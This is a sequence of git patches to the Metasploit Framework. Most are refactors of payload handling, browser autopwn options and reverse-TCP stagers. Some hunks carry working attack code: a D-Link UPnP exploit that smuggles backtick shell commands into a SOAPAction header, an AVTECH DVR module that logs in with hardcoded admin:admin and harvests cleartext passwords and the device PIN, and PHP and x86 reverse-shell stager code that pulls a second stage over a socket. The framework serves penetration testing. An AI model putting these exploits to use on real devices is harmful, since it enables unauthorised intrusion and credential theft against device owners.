+      generic: { payload: 'generic/shell_reverse_tcp',         lport: 4459 }
     }
 
 
@@ -280,16 +280,16 @@ module Msf
     # Returns a payload name. Either this will be the user's choice, or falls back to a default one.
     #
     # @see DEFAULT_PAYLOADS The default settings.
-    # @param [String] platform Platform name.
+    # @param [Symbol] platform Platform name.
     # @return [String] Payload name.
     def get_selected_payload_name(platform)
-      payload_name = datastore["PAYLOAD_#{platform.upcase}"]
+      payload_name = datastore["PAYLOAD_#{platform.to_s.upcase}"]
 
       # The payload is legit, we can use it.
       # Avoid #create seems faster
       return payload_name if framework.payloads.keys.include?(payload_name)
 
-      default = DEFAULT_PAYLOADS[platform]['payload']
+      default = DEFAULT_PAYLOADS[platform][:payload]
 
       # The user has configured some unknown payload that we can't use,
       # fall back to default.
@@ -302,7 +302,7 @@ module Msf
     # @param [String] platform
     # @return [Fixnum]
     def get_selected_payload_lport(platform)
-      datastore["PAYLOAD_#{platform.upcase}_LPORT"]
+      datastore["PAYLOAD_#{platform.to_s.upcase}_LPORT"]
     end
 
 
@@ -375,7 +375,7 @@ module Msf
 
     def is_payload_platform_compatible?(m, payload_platform)
       begin
-        platform_obj = Msf::Module::Platform.find_platform(payload_platform)
+        platform_obj = Msf::Module::Platform.find_platform(payload_platform.to_s)
       rescue ArgumentError
         false
       end
@@ -557,7 +557,7 @@ module Msf
         'Columns' => ['Option Name', 'Description']
       )
       DEFAULT_PAYLOADS.each_pair do |platform, payload_info|
-        table << ["PAYLOAD_#{platform.upcase}", "Payload for #{platform} browser exploits"]
+        table << ["PAYLOAD_#{platform.to_s.upcase}", "Payload for #{platform} browser exploits"]
       end
       print_line(table.to_s)
       print_status("Example: set PAYLOAD_WIN windows/meterpreter/reverse_tcp")
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index 6302cd4d2f..809eba0fb7 100644
--- a/modules/exploits/multi/browser/autopwn.rb
+++ b/modules/exploits/multi/browser/autopwn.rb
@@ -90,8 +90,8 @@ class Metasploit3 < Msf::Exploit::Remote
   def get_advanced_options
     opts = []
     DEFAULT_PAYLOADS.each_pair do |platform, payload_info|
-      opts << OptString.new("PAYLOAD_#{platform.upcase}", [true, "Payload for #{platform} browser exploits", payload_info['payload'] ])
-      opts << OptInt.new("PAYLOAD_#{platform.upcase}_LPORT", [true, "Payload LPORT for #{platform} browser exploits", payload_info['lport']])
+      opts << OptString.new("PAYLOAD_#{platform.to_s.upcase}", [true, "Payload for #{platform} browser exploits", payload_info[:payload] ])
+      opts << OptInt.new("PAYLOAD_#{platform.to_s.upcase}_LPORT", [true, "Payload LPORT for #{platform} browser exploits", payload_info[:lport]])
     end
 
     opts

From c3fa52f443a0b807c9c40e110889f020d7e6a764 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 29 May 2015 13:47:20 -0500
Subject: [PATCH 0244/1013] Update description

---
 .../exploits/windows/browser/ms14_064_ole_code_execution.rb  | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
index 3d2685d75a..833e4383d2 100644
--- a/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
+++ b/modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
@@ -19,8 +19,9 @@ class Metasploit4 < Msf::Exploit::Remote
       'Name'           => "MS14-064 Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
       'Description'    => %q{
         This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.
-        The vulnerability affects Internet Explorer 3.0 until version 11 within Windows 95 up to
-        Windows 10, and there is no patch for Windows XP or older.
+        The vulnerability is known to affect Internet Explorer 3.0 until version 11 within
+        Windows 95 up to Windows 10, and no patch for Windows XP. However, this exploit will
+        only target Windows XP and Windows 7 box due to the Powershell limitation.
 
         Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other
         newer Windows systems, the exploit will try using Powershell instead.

From 340792aae46c1230f7160c240b1ea0d04489cf4e Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 29 May 2015 14:34:27 -0500
Subject: [PATCH 0245/1013] don't jump past the uuid sender on win32/tcp
 connect

---
 lib/msf/core/payload/linux/send_uuid.rb       | 2 +-
 lib/msf/core/payload/windows/reverse_tcp.rb   | 6 ++++--
 lib/msf/core/payload/windows/send_uuid.rb     | 2 +-
 lib/msf/core/payload/windows/x64/send_uuid.rb | 2 +-
 4 files changed, 7 insertions(+), 5 deletions(-)

diff --git a/lib/msf/core/payload/linux/send_uuid.rb b/lib/msf/core/payload/linux/send_uuid.rb
index 977b70b453..c010944c0e 100644
--- a/lib/msf/core/payload/linux/send_uuid.rb
+++ b/lib/msf/core/payload/linux/send_uuid.rb
@@ -28,7 +28,7 @@ module Payload::Linux::SendUUID
         push ecx                      ; store ecx for later
         push 0                        ; terminate the args array
         push #{uuid_raw.length}       ; length of the UUID
-        call get_uuid_address         ; put uuid buffer on tehe stack
+        call get_uuid_address         ; put uuid buffer on the stack
         db #{raw_to_db(uuid_raw)}     ; UUID itself
       get_uuid_address:
         push edi                      ; socket handle
diff --git a/lib/msf/core/payload/windows/reverse_tcp.rb b/lib/msf/core/payload/windows/reverse_tcp.rb
index c8f3731104..360b690355 100644
--- a/lib/msf/core/payload/windows/reverse_tcp.rb
+++ b/lib/msf/core/payload/windows/reverse_tcp.rb
@@ -177,11 +177,13 @@ module Payload::Windows::ReverseTcp
       end
 =end
 
+    asm << %Q^
+      connected:
+      ^
+
     asm << asm_send_uuid if include_send_uuid
 
     asm << %Q^
-      connected:
-
       recv:
         ; Receive the size of the incoming second stage...
         push 0                 ; flags
diff --git a/lib/msf/core/payload/windows/send_uuid.rb b/lib/msf/core/payload/windows/send_uuid.rb
index 234c24b5b2..94e0b09e8b 100644
--- a/lib/msf/core/payload/windows/send_uuid.rb
+++ b/lib/msf/core/payload/windows/send_uuid.rb
@@ -27,7 +27,7 @@ module Payload::Windows::SendUUID
       send_uuid:
         push 0                 ; flags
         push #{uuid_raw.length} ; length of the UUID
-        call get_uuid_address  ; put uuid buffer on tehe stack
+        call get_uuid_address  ; put uuid buffer on the stack
         db #{raw_to_db(uuid_raw)}  ; UUID
       get_uuid_address:
         push edi               ; saved socket
diff --git a/lib/msf/core/payload/windows/x64/send_uuid.rb b/lib/msf/core/payload/windows/x64/send_uuid.rb
index 8693109e95..f804d3ae0e 100644
--- a/lib/msf/core/payload/windows/x64/send_uuid.rb
+++ b/lib/msf/core/payload/windows/x64/send_uuid.rb
@@ -28,7 +28,7 @@ module Payload::Windows::SendUUID_x64
         xor r9, r9              ; flags
         push #{uuid_raw.length} ; length of the UUID
         pop r8
-        call get_uuid_address  ; put uuid buffer on tehe stack
+        call get_uuid_address  ; put uuid buffer on the stack
         db #{raw_to_db(uuid_raw)}  ; UUID
       get_uuid_address:
         pop rdx                ; UUID address

From 8b2e49eabc4fa90b122a2d09db75b96105f6aded Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 29 May 2015 14:45:47 -0500
Subject: [PATCH 0246/1013] Do code cleanup

---
 lib/rex/exploitation/cmdstager/echo.rb        |  9 +++---
 .../http/dlink_upnp_header_exec_noauth.rb     | 32 +++++++++----------
 2 files changed, 19 insertions(+), 22 deletions(-)

diff --git a/lib/rex/exploitation/cmdstager/echo.rb b/lib/rex/exploitation/cmdstager/echo.rb
index 253eb48214..462aade850 100644
--- a/lib/rex/exploitation/cmdstager/echo.rb
+++ b/lib/rex/exploitation/cmdstager/echo.rb
@@ -26,11 +26,10 @@ class CmdStagerEcho < CmdStagerBase
   # and initialize opts[:enc_format].
   #
   def generate(opts = {})
-    if opts[:temp] == false
-      opts[:temp] = ''
-    else
-      opts[:temp] = opts[:temp] || '/tmp/'
-      opts[:temp].gsub!(/\\/, "/")
+    opts[:temp] = opts[:temp] || '/tmp/'
+
+    unless opts[:temp].empty?
+      opts[:temp].gsub!(/\\/, '/')
       opts[:temp] = opts[:temp].shellescape
       opts[:temp] << '/' if opts[:temp][-1,1] != '/'
     end
diff --git a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
index b6bdb4e24d..9ac06e2df9 100644
--- a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
@@ -18,9 +18,9 @@ class Metasploit3 < Msf::Exploit::Remote
         Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
         interface. Since it is a blind OS command injection vulnerability, there is no
         output for the executed command. This module has been tested on a DIR-645 device.
-        The following devices are also reported as affected:
-        DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB
-        DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
+        The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,
+        DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB DIR-815 revB, DIR-300 revB,
+        DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
       },
       'Author'      =>
         [
@@ -36,21 +36,19 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DisclosureDate' => 'Feb 13 2015',
       'Privileged'     => true,
-      'Platform'       => 'unix',
+      'Platform'       => 'linux',
       'Targets' =>
         [
           [ 'MIPS Little Endian',
             {
-              'Platform' => 'linux',
               'Arch'     => ARCH_MIPSLE
             }
           ],
           [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
             {
-              'Platform' => 'linux',
               'Arch'     => ARCH_MIPSBE
             }
-          ],
+          ]
         ],
       'DefaultTarget'    => 0
       ))
@@ -60,16 +58,17 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def check
     uri = '/HNAP1/'
-    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings"
+    soap_action = 'http://purenetworks.com/HNAP1/GetDeviceSettings'
 
     begin
       res = send_request_cgi({
         'uri'    => uri,
         'method' => 'GET',
         'headers' => {
-          'SOAPAction' => soapaction,
-          },
+          'SOAPAction' => soap_action,
+          }
       })
+
       if res && [200].include?(res.code) && res.body =~ /D-Link/
         return Exploit::CheckCode::Detected
       end
@@ -92,26 +91,25 @@ class Metasploit3 < Msf::Exploit::Remote
     execute_cmdstager(
       :flavor  => :echo,
       :linemax => 200,
-      :temp    => false
+      :temp    => ''
     )
-
   end
 
   def execute_command(cmd, opts)
 
     uri = '/HNAP1/'
 
-    cmd_new = "cd && cd tmp && export PATH=$PATH:. && " << cmd
-    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
+    cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
+    soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
 
     begin
       res = send_request_cgi({
         'uri'    => uri,
         'method' => 'GET',
         'headers' => {
-          'SOAPAction' => soapaction,
-          },
-      },1)
+          'SOAPAction' => soap_action,
+          }
+      }, 3)
     rescue ::Rex::ConnectionError
       fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
     end

From b33ace2f44146bce62f60cce62f9928cae479e28 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 29 May 2015 15:07:59 -0500
Subject: [PATCH 0247/1013] Put is_payload_compatible? in exploit.rb

---
 lib/msf/core/exploit.rb      | 33 +++++++++++++++++++++++++++++++++
 lib/msf/ui/console/driver.rb | 11 +----------
 2 files changed, 34 insertions(+), 10 deletions(-)

diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb
index 028c792fe8..6740bf339d 100644
--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -698,6 +698,39 @@ class Exploit < Msf::Module
     (target and target.arch) ? target.arch : (arch == []) ? nil : arch
   end
 
+  def is_payload_compatible?(payload_name)
+    c_platform = (target and target.platform) ? target.platform : platform
+    c_arch     = (target and target.arch)     ? target.arch     : (arch == []) ? nil : arch
+    c_arch   ||= [ ARCH_X86 ]
+
+    framework.payloads.each_module(
+      'Platform' => c_platform,
+      'Arch'     => c_arch ) { |name, mod|
+
+      # Skip over payloads that are too big
+      if ((payload_space) and
+          (framework.payloads.sizes[name]) and
+          (framework.payloads.sizes[name] > payload_space))
+        dlog("#{refname}: Skipping payload #{name} for being too large", 'core',
+          LEV_1)
+        next
+      end
+
+      # Are we compatible in terms of conventions and connections and
+      # what not?
+      next if (compatible?(framework.payloads.instance(name)) == false)
+
+      # If the payload is privileged but the exploit does not give
+      # privileged access, then fail it.
+      next if (self.privileged == false and framework.payloads.instance(name).privileged == true)
+
+      # This one be compatible!
+      return true if payload_name == name
+    }
+
+    false
+  end
+
   #
   # Returns a list of compatible payloads based on platform, architecture,
   # and size requirements.
diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb
index de7dd7f2e7..8d1729f7f7 100644
--- a/lib/msf/ui/console/driver.rb
+++ b/lib/msf/ui/console/driver.rb
@@ -571,7 +571,7 @@ class Driver < Msf::Ui::Driver
 
         if (framework and framework.payloads.valid?(val) == false)
           return false
-        elsif active_module.type == 'exploit' && !is_payload_compatible?(active_module, val)
+        elsif active_module.type == 'exploit' && !active_module.is_payload_compatible?(val)
           return false
         elsif (active_module)
           active_module.datastore.clear_non_user_defined
@@ -591,15 +591,6 @@ class Driver < Msf::Ui::Driver
     end
   end
 
-
-  def is_payload_compatible?(m, payload_name)
-    m.compatible_payloads.each do |k|
-      return true if k[0] == payload_name
-    end
-
-    false
-  end
-
   #
   # Called when a variable is unset.  If this routine returns false it is an
   # indication that the variable should not be allowed to be unset.

From defda01d87f6064413c802a69f12438ad285b9c6 Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Fri, 29 May 2015 15:09:29 -0500
Subject: [PATCH 0248/1013] Some doc

---
 lib/msf/core/exploit.rb | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb
index 6740bf339d..8d4f02fdc3 100644
--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -698,6 +698,14 @@ class Exploit < Msf::Module
     (target and target.arch) ? target.arch : (arch == []) ? nil : arch
   end
 
+
+  #
+  # Returns whether the requested payload is compatible with the module.
+  #
+  # @param [String] payload_name The payload name
+  # @return [TrueClass] Payload is compatible.
+  # @return [FalseClass] Payload is not compatible.
+  #
   def is_payload_compatible?(payload_name)
     c_platform = (target and target.platform) ? target.platform : platform
     c_arch     = (target and target.arch)     ? target.arch     : (arch == []) ? nil : arch

From d39d4ff6decf175319d02324ce62676a21d2e789 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 29 May 2015 15:15:49 -0500
Subject: [PATCH 0249/1013] bump to metasploit-payloads 1.0.1

---
 Gemfile.lock                 | 4 ++--
 metasploit-framework.gemspec | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/Gemfile.lock b/Gemfile.lock
index b0fb3003b0..6cc9dd5063 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -9,7 +9,7 @@ PATH
       json
       metasploit-concern (~> 1.0)
       metasploit-model (~> 1.0)
-      metasploit-payloads (= 1.0.0)
+      metasploit-payloads (= 1.0.1)
       msgpack
       nokogiri
       packetfu (= 1.1.9)
@@ -123,7 +123,7 @@ GEM
       activemodel (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
       railties (>= 4.0.9, < 4.1.0)
-    metasploit-payloads (1.0.0)
+    metasploit-payloads (1.0.1)
     metasploit_data_models (1.1.0)
       activerecord (>= 4.0.9, < 4.1.0)
       activesupport (>= 4.0.9, < 4.1.0)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 4b46084af7..ba444f688a 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -64,7 +64,7 @@ Gem::Specification.new do |spec|
   # are needed when there's no database
   spec.add_runtime_dependency 'metasploit-model', '~> 1.0'
   # Needed for Meterpreter on Windows, soon others.
-  spec.add_runtime_dependency 'metasploit-payloads', '1.0.0'
+  spec.add_runtime_dependency 'metasploit-payloads', '1.0.1'
   # Needed by msfgui and other rpc components
   spec.add_runtime_dependency 'msgpack'
   # Needed by anemone crawler

From 8338b21f6c9ec76bdbc656fec693e6e9d284f9d3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 29 May 2015 16:04:29 -0500
Subject: [PATCH 0250/1013] Make some code cleanup

---
 .../gather/avtech744_dvr_account_retrieval.rb | 202 +++++++++---------
 1 file changed, 100 insertions(+), 102 deletions(-)

diff --git a/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb b/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
index f80f61047b..5d299be95b 100644
--- a/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
+++ b/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
@@ -1,110 +1,108 @@
 require 'msf/core'
 
-    class Metasploit3 < Msf::Auxiliary
+class Metasploit3 < Msf::Auxiliary
 
-        include Msf::Exploit::Remote::HttpClient
-        include Msf::Auxiliary::Report
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
 
-        def initialize(info = {})
-            super(update_info(info,
-                'Name'           => 'AVTECH 744 DVR Account Information Retrieval',
-                'Description'    => %q{
-                    This module will extract the account information from the DVR,
-                    including all user's usernames and cleartext passwords plus
-                    the device PIN, along with a few other miscellaneous details.
-                },
-                'Author'         => [ 'nstarke' ],
-                'License'        => MSF_LICENSE
-            ))
-
-            register_options(
-                [
-                    Opt::RPORT(80),
-                ], self.class)
-        end
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'AVTECH 744 DVR Account Information Retrieval',
+      'Description'    => %q{
+        This module will extract the account information from the DVR,
+        including all user's usernames and cleartext passwords plus
+        the device PIN, along with a few other miscellaneous details.
+      },
+      'Author'         => [ 'nstarke' ],
+      'License'        => MSF_LICENSE
+    ))
+  end
 
 
-        def run
-            res = send_request_cgi({
-               'method' => 'POST',
-               'uri' => '/cgi-bin/user/Config.cgi',
-               'cookie' => 'SSID=YWRtaW46YWRtaW4=;',
-               'vars_post' => {
-                    'action' => 'get',
-                    'category' => 'Account.*'
-                }
-            })
+  def run
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => '/cgi-bin/user/Config.cgi',
+      'cookie' => 'SSID=YWRtaW46YWRtaW4=;',
+      'vars_post' => {
+        'action' => 'get',
+        'category' => 'Account.*'
+      }
+    })
 
-            unless res
-                fail_with(Failure::Unreachable, "No response received from the target")
-            end
-
-            unless res.code == 200
-                fail_with(Failure::Unknown, "An unknown error occured")
-            end
-
-            raw_collection = extract_data(res.body)
-            extract_creds(raw_collection)
-
-            p = store_loot('avtech744.dvr.accounts', 'text/plain', rhost, res.body)
-            print_good("avtech744.dvr.accounts stored in #{p}")
-        end
-
-        def extract_data(body)
-            raw_collection = []
-            body.each_line do |line|
-                key, value = line.split('=')
-                if key && value
-                    _, second, third = key.split('.')
-                    if third
-                        index = second.slice(second.length - 1).to_i
-                        raw_collection[index] = raw_collection[index] ||= {}
-                        case third
-                        when "Username"
-                            raw_collection[index][:username] = value.strip!
-                        when "Password"
-                            raw_collection[index][:password] = value.strip!
-                        end
-                    elsif second.include? "Password"
-                          print_good("PIN Retrieved: #{key} - #{value.strip!}")
-                    end
-                end
-            end
-            raw_collection
-        end
-
-        def extract_creds(raw_collection)
-            raw_collection.each do |raw|
-                if raw
-                    service_data = {
-                        address: rhost,
-                        port: rport,
-                        service_name: 'http',
-                        protocol: 'tcp',
-                        workspace_id: myworkspace_id
-                    }
-
-                    credential_data = {
-                        module_fullname: self.fullname,
-                        origin_type: :service,
-                        private_data: raw[:password],
-                        private_type: :password,
-                        username: raw[:username]
-                    }
-
-                    credential_data.merge!(service_data)
-
-                    credential_core = create_credential(credential_data)
-
-                    login_data = {
-                        core: credential_core,
-                        status: Metasploit::Model::Login::Status::UNTRIED
-                    }
-
-                    login_data.merge!(service_data)
-
-                    create_credential_login(login_data)
-                end
-            end
-        end
+    unless res
+      fail_with(Failure::Unreachable, 'No response received from the target')
     end
+
+    unless res.code == 200
+      fail_with(Failure::Unknown, 'An unknown error occured')
+    end
+
+    raw_collection = extract_data(res.body)
+    extract_creds(raw_collection)
+
+    p = store_loot('avtech744.dvr.accounts', 'text/plain', rhost, res.body)
+    print_good("avtech744.dvr.accounts stored in #{p}")
+  end
+
+  def extract_data(body)
+    raw_collection = []
+    body.each_line do |line|
+      key, value = line.split('=')
+      if key && value
+        _, second, third = key.split('.')
+        if third
+          index = second.slice(second.length - 1).to_i
+          raw_collection[index] = raw_collection[index] ||= {}
+          case third
+          when 'Username'
+            raw_collection[index][:username] = value.strip!
+          when 'Password'
+            raw_collection[index][:password] = value.strip!
+          end
+        elsif second.include?('Password')
+          print_good("PIN Retrieved: #{key} - #{value.strip!}")
+        end
+      end
+    end
+
+    raw_collection
+  end
+
+  def extract_creds(raw_collection)
+    raw_collection.each do |raw|
+      unless raw
+        next
+      end
+
+      service_data = {
+        address: rhost,
+        port: rport,
+        service_name: 'http',
+        protocol: 'tcp',
+        workspace_id: myworkspace_id
+      }
+
+      credential_data = {
+        module_fullname: self.fullname,
+        origin_type: :service,
+        private_data: raw[:password],
+        private_type: :password,
+        username: raw[:username]
+      }
+
+      credential_data.merge!(service_data)
+
+      credential_core = create_credential(credential_data)
+
+      login_data = {
+        core: credential_core,
+        status: Metasploit::Model::Login::Status::UNTRIED
+      }
+
+      login_data.merge!(service_data)
+
+      create_credential_login(login_data)
+    end
+  end
+end

From 73f7885eeae4819d4579b07531d727f0cc00efff Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer <firefart@gmail.com>
Date: Fri, 29 May 2015 23:08:55 +0200
Subject: [PATCH 0251/1013] add comment

---
 modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
index 9ac06e2df9..5b57976022 100644
--- a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
@@ -99,6 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     uri = '/HNAP1/'
 
+    # we can not use / in our command so we need to use a little trick
     cmd_new = 'cd && cd tmp && export PATH=$PATH:. && ' << cmd
     soap_action = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
 

From 39ae6263e95e813fda9819ed421752877c3f16cf Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 29 May 2015 16:12:21 -0500
Subject: [PATCH 0252/1013] Use Rex::Text.encode_base64

---
 .../auxiliary/gather/avtech744_dvr_account_retrieval.rb   | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb b/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
index 5d299be95b..d387490be0 100644
--- a/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
+++ b/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
@@ -9,9 +9,9 @@ class Metasploit3 < Msf::Auxiliary
     super(update_info(info,
       'Name'           => 'AVTECH 744 DVR Account Information Retrieval',
       'Description'    => %q{
-        This module will extract the account information from the DVR,
-        including all user's usernames and cleartext passwords plus
-        the device PIN, along with a few other miscellaneous details.
+        This module will extract the accounts information from the AVTECH 744 DVR devices,
+        including all the usernames and cleartext passwords plus the device PIN, along with
+        a few other miscellaneous details.
       },
       'Author'         => [ 'nstarke' ],
       'License'        => MSF_LICENSE
@@ -23,7 +23,7 @@ class Metasploit3 < Msf::Auxiliary
     res = send_request_cgi({
       'method' => 'POST',
       'uri' => '/cgi-bin/user/Config.cgi',
-      'cookie' => 'SSID=YWRtaW46YWRtaW4=;',
+      'cookie' => "SSID=#{Rex::Text.encode_base64('admin:admin')};",
       'vars_post' => {
         'action' => 'get',
         'category' => 'Account.*'

From acb0af3826f64baa5769fb63a91b0d03e7c9c75f Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 29 May 2015 16:13:43 -0500
Subject: [PATCH 0253/1013] Update description

---
 modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb b/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
index d387490be0..ea39608764 100644
--- a/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
+++ b/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
@@ -11,7 +11,9 @@ class Metasploit3 < Msf::Auxiliary
       'Description'    => %q{
         This module will extract the accounts information from the AVTECH 744 DVR devices,
         including all the usernames and cleartext passwords plus the device PIN, along with
-        a few other miscellaneous details.
+        a few other miscellaneous details. In order to extract the information, hardcoded
+        credentials admin/admin are used. These credentials can't be changed from the device
+        console UI neither the web UI.
       },
       'Author'         => [ 'nstarke' ],
       'License'        => MSF_LICENSE

From 843572df6d1159105af7dcbd9d78bfd35a0d2bab Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 29 May 2015 16:14:16 -0500
Subject: [PATCH 0254/1013] Change module filename

---
 ...tech744_dvr_account_retrieval.rb => avtech744_dvr_accounts.rb} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename modules/auxiliary/gather/{avtech744_dvr_account_retrieval.rb => avtech744_dvr_accounts.rb} (100%)

diff --git a/modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb b/modules/auxiliary/gather/avtech744_dvr_accounts.rb
similarity index 100%
rename from modules/auxiliary/gather/avtech744_dvr_account_retrieval.rb
rename to modules/auxiliary/gather/avtech744_dvr_accounts.rb

From 6d488c63d4318be161f169aa5e74d8cadfcb20a3 Mon Sep 17 00:00:00 2001
From: Brent Cook <bcook@rapid7.com>
Date: Fri, 29 May 2015 16:33:03 -0500
Subject: [PATCH 0255/1013] php UUIDOptions->UUID::Options

---
 lib/msf/core/payload/php/reverse_tcp.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/lib/msf/core/payload/php/reverse_tcp.rb b/lib/msf/core/payload/php/reverse_tcp.rb
index e3db9eff11..5b509612ad 100644
--- a/lib/msf/core/payload/php/reverse_tcp.rb
+++ b/lib/msf/core/payload/php/reverse_tcp.rb
@@ -3,7 +3,7 @@
 
 require 'msf/core'
 require 'msf/core/payload/php/send_uuid'
-require 'msf/core/payload/uuid_options'
+require 'msf/core/payload/uuid/options'
 
 module Msf
 
@@ -16,7 +16,7 @@ module Msf
 module Payload::Php::ReverseTcp
 
   include Msf::Payload::Php::SendUUID
-  include Msf::Payload::UUIDOptions
+  include Msf::Payload::UUID::Options
 
   #
   # Generate the first stage
@@ -76,7 +76,7 @@ if (!$s) { die('no socket'); }
 
     php << php_send_uuid if include_send_uuid
 
-    php << %Q^switch ($s_type) { 
+    php << %Q^switch ($s_type) {
 case 'stream': $len = fread($s, 4); break;
 case 'socket': $len = socket_read($s, 4); break;
 }
@@ -90,7 +90,7 @@ $len = $a['len'];
 
 $b = '';
 while (strlen($b) < $len) {
-	switch ($s_type) { 
+	switch ($s_type) {
 	case 'stream': $b .= fread($s, $len-strlen($b)); break;
 	case 'socket': $b .= socket_read($s, $len-strlen($b)); break;
 	}

From af326a4f88ad07164f113b5d3635e2f540476293 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Fri, 29 May 2015 16:55:19 -0500
Subject: [PATCH 0256/1013] Use compatible_payloads instead of copy and paste

---
 lib/msf/core/exploit.rb | 31 ++-----------------------------
 1 file changed, 2 insertions(+), 29 deletions(-)

diff --git a/lib/msf/core/exploit.rb b/lib/msf/core/exploit.rb
index 8d4f02fdc3..2e16e5a978 100644
--- a/lib/msf/core/exploit.rb
+++ b/lib/msf/core/exploit.rb
@@ -707,36 +707,9 @@ class Exploit < Msf::Module
   # @return [FalseClass] Payload is not compatible.
   #
   def is_payload_compatible?(payload_name)
-    c_platform = (target and target.platform) ? target.platform : platform
-    c_arch     = (target and target.arch)     ? target.arch     : (arch == []) ? nil : arch
-    c_arch   ||= [ ARCH_X86 ]
+    payload_names = compatible_payloads.collect { |entry| entry[0] }
 
-    framework.payloads.each_module(
-      'Platform' => c_platform,
-      'Arch'     => c_arch ) { |name, mod|
-
-      # Skip over payloads that are too big
-      if ((payload_space) and
-          (framework.payloads.sizes[name]) and
-          (framework.payloads.sizes[name] > payload_space))
-        dlog("#{refname}: Skipping payload #{name} for being too large", 'core',
-          LEV_1)
-        next
-      end
-
-      # Are we compatible in terms of conventions and connections and
-      # what not?
-      next if (compatible?(framework.payloads.instance(name)) == false)
-
-      # If the payload is privileged but the exploit does not give
-      # privileged access, then fail it.
-      next if (self.privileged == false and framework.payloads.instance(name).privileged == true)
-
-      # This one be compatible!
-      return true if payload_name == name
-    }
-
-    false
+    payload_names.include?(payload_name)
   end
 
   #

